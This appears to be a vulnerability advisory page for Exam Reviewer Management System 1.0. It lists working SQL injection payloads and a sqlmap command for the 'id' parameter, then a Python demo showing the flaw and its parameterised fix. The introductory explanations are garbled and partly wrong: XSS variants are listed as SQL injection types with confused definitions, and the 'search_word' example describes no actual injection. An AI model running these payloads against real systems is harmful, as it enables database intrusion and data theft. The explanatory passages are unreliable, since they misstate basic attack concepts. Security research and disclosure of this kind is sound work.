The id parameter is usually used to select a specific record when creating a new post. If an attacker inputs ‘;’ or other malicious characters into this field, it may allow them to access any record.
Exam Reviewer Management System 1.0 is vulnerable to Cross-site scripting (XSS) via the ‘title’ parameter.
The ‘title’ parameter can be used on posts to add a message to the top of the post. The messages can be anything from instructions to users on how to use the site. This can be problematic as it can allow for a malicious user to inject scripts into the site to steal data or perform other attacks.
Exam Reviewer Management System 1.0 is vulnerable to SQL Injection via the ‘search_word’ parameter.
The ‘search_word’ parameter can be used to filter posts. For example, if an attacker inputs ‘&1’ into the ‘search_word’ parameter, then only posts that include ‘&1’ will be returned.
SQL Injection - Introduction
SQL Injection is a type of injection attack that exploits the database underlying an application to inject, read, or modify data. This is done by inserting SQL code either through the application’s input fields or into its application logic.
There are many different types of SQL Injection attacks, but some of the more common ones include:
* Blind SQL Injection: Using some simple syntax elements to construct a valid SQL query that would execute on the target system.
* Stored-XSS: Constructing a payload in such a way that it looks like it is stored in the application and not executed when submitted to it; this is achieved by using whitespace characters, comments, and other non-executing syntax elements.
* Reflected XSS: Using a payload that appears to originate from the application and is returned to the attacker who submitted it when executed.
* Mixed XSS: Combining both blind and reflected XSS methods together.
Exploit
# Exploit Title: Exam Reviewer Management System 1.0 - ‘id’ SQL Injection
# Date: 2022-02-18
# Exploit Author: Juli Agarwal(@agarwaljuli)
# Vendor Homepage: https://www.sourcecodester.com/php/15160/simple-exam-reviewer-management-system-phpoop-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=15160&title=Simple+Exam+Reviewer+Management+System+in+PHP%2FOOP+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10/Kali Linux

Description – The ‘id’ parameter in Exam Reviewer Management System web application is vulnerable to SQL Injection
Vulnerable URL - http://127.0.0.1/erms/?p=take_exam&id=1
POC:-
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=take_exam&id=1' AND 4755=4755 AND 'VHNu'='VHNu

    Type: error-based
    Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=take_exam&id=1' OR (SELECT 8795 FROM(SELECT COUNT(*),CONCAT(0x71766a7071,(SELECT (ELT(8795=8795,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'MCXA'='MCXA

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=take_exam&id=1' AND (SELECT 2206 FROM (SELECT(SLEEP(5)))AhEo) AND 'vqGg'='vqGg
---
SQLMAP COMMAND
# sqlmap -u "127.0.0.1/erms/?p=take_exam&id=1" -p id --dbs --level 3

Timeline
Published on: 09/27/2022 23:15:00 UTC
Last modified on: 09/28/2022 23:06:00 UTC
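The following is an added example, not code from the advisory or from the Exam Reviewer Management System itself. It reproduces, against an in-memory SQLite table with an assumed schema, why the boolean-based blind payload from the sqlmap output above works: when the ‘id’ value is concatenated into the query text, a true condition returns the record and a false one does not, which is the oracle a blind injection relies on. Binding ‘id’ as a parameter removes that difference.

```python
import sqlite3

def setup_db():
    # Constructed sample table; the real application's schema is not on
    # the page, so the table and column names are assumptions.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE exams (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO exams VALUES (?, ?)",
                     [(1, "Algebra"), (2, "History")])
    return conn

def take_exam_vulnerable(conn, id_param):
    # Same flaw as the advisory describes: the raw id value is pasted into
    # the SQL string, so quotes and operators inside it become SQL.
    sql = f"SELECT id, title FROM exams WHERE id = '{id_param}'"
    return conn.execute(sql).fetchall()

def take_exam_fixed(conn, id_param):
    # Hardened form: the value is bound as a parameter and is never parsed
    # as SQL, whatever characters it contains.
    sql = "SELECT id, title FROM exams WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()

# Boolean-based blind payload taken from the sqlmap output above, and a
# constructed variant whose injected condition is false.
TRUE_PAYLOAD = "1' AND 4755=4755 AND 'VHNu'='VHNu"
FALSE_PAYLOAD = "1' AND 4755=4756 AND 'VHNu'='VHNu"

def demo():
    conn = setup_db()
    return {
        # Vulnerable: the response differs with the truth of the injected
        # condition, so an attacker can infer data one bit at a time.
        "vuln_true": take_exam_vulnerable(conn, TRUE_PAYLOAD),
        "vuln_false": take_exam_vulnerable(conn, FALSE_PAYLOAD),
        # Fixed: the payload is compared as a plain string and matches no id.
        "fixed_true": take_exam_fixed(conn, TRUE_PAYLOAD),
        "fixed_false": take_exam_fixed(conn, FALSE_PAYLOAD),
        # Fixed: a legitimate id still works.
        "fixed_legit": take_exam_fixed(conn, "1"),
    }

if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name}: {rows}")
```

A further defence in the real application is to validate ‘id’ as an integer before it reaches the query at all, so the request is rejected on the way in.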